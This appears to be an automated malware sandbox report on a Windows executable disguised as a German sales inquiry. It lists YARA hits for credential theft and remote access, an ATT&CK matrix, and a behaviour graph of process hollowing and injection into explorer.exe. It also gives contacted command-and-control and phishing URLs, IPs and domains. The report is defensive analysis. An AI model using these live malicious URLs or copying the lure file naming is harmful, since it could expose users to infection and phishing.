          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          1
          DLL Side-Loading
          512
          Process Injection
          1
          Masquerading
          OS Credential Dumping221
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory2
          Process Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets112
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Timestomp
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          DLL Side-Loading
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          File Deletion
          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 606176 Sample: Anfrage Angebot RESALE DE M... Startdate: 09/04/2022 Architecture: WINDOWS Score: 100 36 www.tsctribe.com 2->36 38 www.nevalostrecords.com 2->38 40 2 other IPs or domains 2->40 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 10 other signatures 2->52 11 Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe 3 2->11         started        signatures3 process4 file5 28 Anfrage Angebot RE...54229005678.exe.log, ASCII 11->28 dropped 14 Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe 11->14         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 10thring.com 185.111.89.175, 49787, 80 WEBSUPPORT-SRO-SK-ASSK Hungary 17->30 32 www.tunnelvisionconference.com 216.250.121.17, 49751, 80 ONEANDONE-ASBrauerstrasse48DE United States 17->32 34 10 other IPs or domains 17->34 42 System process connects to network (likely due to code injection or exploit) 17->42 44 Performs DNS queries to domains with low reputation 17->44 21 msiexec.exe 17->21         started        signatures10 process11 signatures12 54 Self deletion via cmd delete 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 Maps a DLL or memory area into another process 21->58 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe32%VirustotalBrowse
          Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe23%MetadefenderBrowse
          Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe62%ReversingLabsByteCode-MSIL.Spyware.Noon
          Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          SourceDetectionScannerLabelLink
          youcanstores.com9%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.youcanstores.com/g6k0/?oT=YhpnqMeKeHQV9hpawJJ8kDg8ped7Wcc3vUTi9AzVcbGOoRzcVA1Xx6BKuahE3Ao/4185&vDKd7h=9rjLcdHx-0r100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/8%;0%Avira URL Cloudsafe
          http://www.fontbureau.comFR0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.williamhag.online/g6k0/?oT=1yOpS97qTPJuX4vdeJnQ3O9XBc/xzRMbKQW/nvdMbZZlwvnrgiUHRDWYI6wAZPcgG2JU&vDKd7h=9rjLcdHx-0r100%Avira URL Cloudphishing
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fontbureau.comcom90%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.fontbureau.comB.TTF0%URL Reputationsafe
          http://www.fontbureau.comoD0%Avira URL Cloudsafe
          http://www.tiro.comxg0%Avira URL Cloudsafe
          http://www.fontbureau.comoitua0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.com90%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.comD0%Avira URL Cloudsafe
          www.cannonbrookes.online/g6k0/100%Avira URL Cloudphishing
          http://www.jiyu-kobo.co.jp/2v0%Avira URL Cloudsafe
          http://www.10thring.com/g6k0/?oT=6RYluMxNX3+UBUvEGFzo52kesULJ7OMzMGVALFRE7BcQ/7Cn+C5GWBVLLjru1ffm4ceC&vDKd7h=9rjLcdHx-0r0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/R0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/M0%URL Reputationsafe
          http://www.urwpp.deet0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.monotype.0%URL Reputationsafe
          http://www.terrierslovjt.xyz/g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0r100%Avira URL Cloudphishing
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
